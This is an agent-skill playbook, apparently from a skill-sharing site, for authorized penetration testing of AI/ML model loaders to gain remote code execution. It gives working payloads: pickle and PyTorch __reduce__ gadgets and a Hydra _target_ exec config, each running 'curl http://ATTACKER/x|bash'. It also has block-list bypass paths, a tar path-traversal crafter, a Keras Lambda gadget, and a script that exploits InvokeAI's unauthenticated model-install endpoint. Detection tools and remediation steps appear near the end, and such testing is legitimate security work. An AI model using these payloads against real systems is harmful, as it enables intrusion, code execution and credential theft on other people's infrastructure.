exploiting-ai-model-file-rce

Name: exploiting-ai-model-file-rce
Author: xalgord/xalgorix
$npx mdskill add xalgord/xalgorix/exploiting-ai-model-file-rce
- During authorized assessments of ML training/inference pipelines, model registries, artifact buckets, or model hubs - When a service downloads, loads, or "installs" models from user-controlled URLs or untrusted repositories - When auto-resume/auto-deploy pipelines load checkpoints (`.ckpt`, `.pt`, `.pth`, `.bin`) without provenance checks - When assessing web UIs like InvokeAI, TorchServe, Triton, or NeMo/HuggingFace coders that accept model files - When reviewing whether "safe" formats (`.safetensors`, `.nemo`, repo `config.json`) still expose instantiation gadgets
SKILL.md
.github/skills/exploiting-ai-model-file-rceView on GitHub ↗
---
name: exploiting-ai-model-file-rce
description: Testing machine-learning model files and model-loading services for remote code execution caused by insecure
  deserialization (pickle/PyTorch), unsafe config instantiation (Hydra), archive path traversal, and dangerous layer types
  during authorized penetration tests of AI/ML pipelines.
domain: cybersecurity
subdomain: ai-security
tags:
- ai-security
- model-deserialization
- penetration-testing
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Exploiting AI Model File RCE

## When to Use

- During authorized assessments of ML training/inference pipelines, model registries, artifact buckets, or model hubs
- When a service downloads, loads, or "installs" models from user-controlled URLs or untrusted repositories
- When auto-resume/auto-deploy pipelines load checkpoints (`.ckpt`, `.pt`, `.pth`, `.bin`) without provenance checks
- When assessing web UIs like InvokeAI, TorchServe, Triton, or NeMo/HuggingFace coders that accept model files
- When reviewing whether "safe" formats (`.safetensors`, `.nemo`, repo `config.json`) still expose instantiation gadgets

## Prerequisites

- **Authorization**: Written penetration testing agreement covering the ML systems and any callback infrastructure
- **Python 3** with `torch`, `joblib`, `numpy`, `tensorflow`/`keras` to craft and load test artifacts in a sandbox
- **fickling, modelscan, picklescan**: static analyzers to inspect pickle opcodes before/after crafting payloads
- **A controlled callback host**: HTTP listener / OOB server (e.g. interactsh) for blind execution confirmation
- **Isolated VM/container**: NEVER load untrusted models on your own host — payloads run during load

## Critical: Techniques Most Often Missed (test these for EVERY model artifact)

Scanners that only diff weights miss code execution that fires *during load*, before any
inference runs. For every model file or model-loading endpoint, work the full matrix below.

```text
# 1. Python pickle reducer (THE #1 vector). Any pickle-backed format runs
#    __reduce__ on load: .pkl, .pt, .pth, .ckpt, .bin, joblib, numpy .npy/.npz.
#    torch.load WITHOUT weights_only=True deserializes pickle → code exec.
class Payload:
    def __reduce__(self):
        import os
        return (os.system, ("curl http://ATTACKER/x|bash",))

# 2. Hydra _target_ instantiation — NO pickle needed. Triggers on "safe"
#    formats (.safetensors __metadata__, .nemo model_config.yaml, config.json)
#    when libs feed untrusted metadata to hydra.utils.instantiate().
#      _target_: builtins.exec
#      _args_: ["import os; os.system('id')"]
#    Block-list bypass: enum.bltns.eval, nemo.core.classes.common.os.system

# 3. Keras/TensorFlow Lambda layer — arbitrary Python in legacy .h5/HDF5 and
#    .keras (safe_mode does NOT cover the old H5 format → "downgrade attack").
#    Also CVE-2021-37678: yaml.unsafe_load when loading model from YAML.

# 4. Archive path traversal — most formats are .zip/.tar under the hood.
#    Craft member name "../../tmp/hacked" or a SYMTYPE symlink to write/read
#    arbitrary files on load (ONNX external-weights, model tars).

# 5. GGUF / GGML parser memory corruption (CVE-2024-25664..25668): malformed
#    .gguf triggers heap overflow in the parser.

# 6. Service-level loaders: torch.load on user URL (InvokeAI CVE-2024-12029),
#    TorchServe management API (ShellTorch), Triton --model-control path
#    traversal, numpy np.load default allow_pickle.
```

### How to CONFIRM a hit (avoid destructive payloads)

Use a benign, observable side effect — not a destructive command — to confirm execution:

- File-drop marker: `os.system("id > /tmp/pwned_$(hostname)")` then read `/tmp/pwned_*`.
- OOB callback: `curl http://OOB-ID.oob.example/` or DNS lookup; a hit proves blind execution.
- Static pre-check: `fickling --check-safety model.pt` or `modelscan -p model.pt` should flag
  the reducer/`GLOBAL`+`REDUCE` opcodes before you ever load it.
- For Hydra: a process spawn at `from_pretrained`/`restore_from` time, before weights load.
- Treat ANY child process, outbound connection, or unexpected file at load time as a confirmed hit.

## Workflow

### Step 1: Identify the Loader and Format

Determine exactly how the target ingests models and which API does the deserialization.

```bash
# Map model file extensions present in registry/bucket/repo
# .pt .pth .ckpt .bin .pkl  -> pickle-backed (torch.load / joblib / pickle)
# .h5 .hdf5 .keras          -> Keras (Lambda layer / yaml)
# .safetensors .nemo        -> "safe" weights BUT check for Hydra _target_ metadata
# .onnx                     -> archive/external-weights traversal
# .gguf .ggml               -> parser memory corruption
# .npy .npz                 -> numpy allow_pickle

# Inspect a sample pickle artifact statically BEFORE loading
fickling --check-safety suspicious.pt
modelscan -p suspicious.pt
picklescan -p suspicious.pkl
```

### Step 2: Craft a PyTorch / pickle Reducer Payload

The reducer returns a callable + args executed during unpickling.

```python
# payload_gen.py  (run only in an isolated lab)
import torch, os

class Evil:
    def __reduce__(self):  # benign confirmation marker, not destructive
        return (os.system, ("id > /tmp/pwned; curl http://OOB-ID.oob.example/",))

# place under a key deserialized early so it fires before weights are used
torch.save({"model_state_dict": Evil(), "trainer_state": {"epoch": 10}}, "malicious.ckpt")
```

Victim-side this fires even with an error: `torch.load("malicious.ckpt", weights_only=False)`.
A raw `.pkl` works the same with `pickle.dump(Evil(), f)`.

### Step 3: Craft a Hydra `_target_` Payload for "Safe" Formats

When the loader passes model metadata/config to `hydra.utils.instantiate()`, no pickle is required.

```yaml
# goes in .nemo model_config.yaml, repo config.json, or .safetensors __metadata__
_target_: builtins.exec
_args_:
  - "import os; os.system('curl http://ATTACKER/x|bash')"
```

If a string block-list is present, bypass via alternative import paths
(`enum.bltns.eval`) or application-resolved names (`nemo.core.classes.common.os.system`).

### Step 4: Craft Archive Traversal / Keras Lambda Variants

```python
# Archive path traversal: write outside the extract dir on load
import tarfile
def escape(member):
    member.name = "../../tmp/hacked"
    return member
with tarfile.open("traversal_demo.model", "w:gz") as tf:
    tf.add("harmless.txt", filter=escape)

# Symlink variant (member.type = SYMTYPE, linkname = /tmp) rides a planted file
# Keras Lambda layer: a model containing a Lambda(lambda x: __import__('os').system('id'))
#   runs on load; legacy .h5 bypasses safe_mode entirely (downgrade attack).
```

### Step 5: Exploit a Model-Loading Service (InvokeAI CVE-2024-12029)

When a service downloads+loads models from a URL, host the payload and trigger the endpoint.

```python
import requests
# 1) host payload.ckpt (a pickle reducer) on http://ATTACKER/payload.ckpt
# 2) trigger the unauthenticated install endpoint (scan defaults to false in 5.3.1-5.4.2)
requests.post(
    "http://TARGET:9090/api/v2/models/install",
    params={"source": "http://ATTACKER/payload.ckpt", "inplace": "true"},
    json={}, timeout=5,
)
# torch.load() runs the os.system gadget -> RCE as the InvokeAI process
# Metasploit: exploit/linux/http/invokeai_rce_cve_2024_12029
```

For Transformers4Rec/Merlin (CVE-2025-23298) and FaceDetection-DSFD, the same reducer is
delivered via a trojanized checkpoint or pushed as a serialized blob to a deserializing endpoint.

### Step 6: Confirm and Assess Blast Radius

```bash
# confirm out-of-band: inspect OOB server for the callback; on a lab target verify the
# /tmp/pwned marker and running user (often root in containers).
# record: runs as root/privileged container? network egress + ~/.aws/~/.ssh/registry creds?
#         loader in an auto-resume/auto-deploy pipeline (wormable)?
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| **Pickle Reducer** | `__reduce__`/`__setstate__` returns a callable+args executed during unpickling — the core RCE primitive |
| **weights_only** | `torch.load(file, weights_only=True)` blocks arbitrary pickle; absence (CVE-2025-32434 bypass aside) enables RCE |
| **Hydra instantiate** | `hydra.utils.instantiate()` imports+calls any dotted `_target_` from untrusted config/metadata, no pickle needed |
| **Lambda layer RCE** | Keras Lambda layers store arbitrary Python; legacy `.h5` bypasses `safe_mode` (downgrade attack) |
| **Archive slip** | Model formats are `.zip`/`.tar`; crafted member names or symlinks cause path traversal write/read on load |
| **Parser memory corruption** | Malformed GGUF/TFLite files trigger heap overflows in native parsers |
| **Safe format ≠ safe load** | `.safetensors`/`.nemo` carry metadata that can still reach an instantiation gadget |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| **fickling** | Decompile/inspect and safety-check pickle opcodes; detect malicious GLOBAL/REDUCE |
| **modelscan** (Protect AI) | Scan PyTorch/TF/Keras/joblib model files for unsafe operators before loading |
| **picklescan** | Lightweight scanner for dangerous imports/opcodes in pickle files |
| **Metasploit** | `invokeai_rce_cve_2024_12029`, `flowise_*` and other model-service RCE modules |
| **safetensors** | Non-executable weights format; recommended remediation target |
| **Isolated VM/container** | Mandatory sandbox for loading any untrusted artifact (seccomp/AppArmor, no egress) |

## Common Scenarios

### Scenario 1: Trojanized Checkpoint in a Model Hub
A `.ckpt` shared on an internal hub embeds a `__reduce__` gadget. An auto-resume training job
calls `torch.load(..., weights_only=False)` and executes the payload as root in the training container.

### Scenario 2: InvokeAI URL Install RCE
InvokeAI 5.3.1–5.4.2 exposes `/api/v2/models/install` with `scan=false` default. Pointing `source`
at an attacker-hosted `.ckpt` triggers `torch.load` pickle deserialization and unauthenticated RCE.

### Scenario 3: "Safe" Format Still Pops a Shell
A `.safetensors` model ships an `__metadata__` block with `_target_: builtins.exec`. The loader feeds
metadata to `hydra.utils.instantiate()` during `from_pretrained`, executing code before weights load.

### Scenario 4: ONNX/Model Tar Path Traversal
A model tar contains a member named `../../home/user/.bashrc`. Extraction during model load overwrites
the file, achieving persistence/RCE on the next shell session.

## Output Format

```
## AI Model File RCE Finding

**Vulnerability**: Remote Code Execution via Insecure Model Deserialization
**Severity**: Critical (CVSS 9.8)
**Component**: torch.load() in /api/v2/models/install (model loader service)
**CVE / Class**: CVE-2024-12029 / Insecure Deserialization (CWE-502)

### Reproduction Steps
1. Host payload.ckpt (pickle __reduce__ -> os.system) on attacker HTTP server
2. POST source=http://ATTACKER/payload.ckpt to /api/v2/models/install (no auth)
3. Service calls torch.load(); reducer executes; OOB callback received at OOB-ID.oob.example

### Evidence
| Item | Detail |
|------|--------|
| Trigger | torch.load(path) with weights_only unset |
| Confirmation | OOB HTTP callback + /tmp/pwned marker (uid=0 root) |
| Blast radius | Worker runs as root in container with AWS creds + egress |
| Static detector | fickling --check-safety flagged REDUCE -> os.system |

### Recommendation
1. Never deserialize untrusted models; prefer Safetensors/ONNX for weights
2. Use torch.load(weights_only=True) or an allow-listed unpickler
3. Enforce model provenance/signatures and malware-scan before load (scan=True)
4. Sandbox deserialization: non-root, seccomp/AppArmor, no network egress
5. Reject untrusted Hydra _target_ / Keras Lambda; validate config metadata
6. Patch loaders (InvokeAI >= 5.4.3, TorchServe, Triton, GGML) to fixed versions
```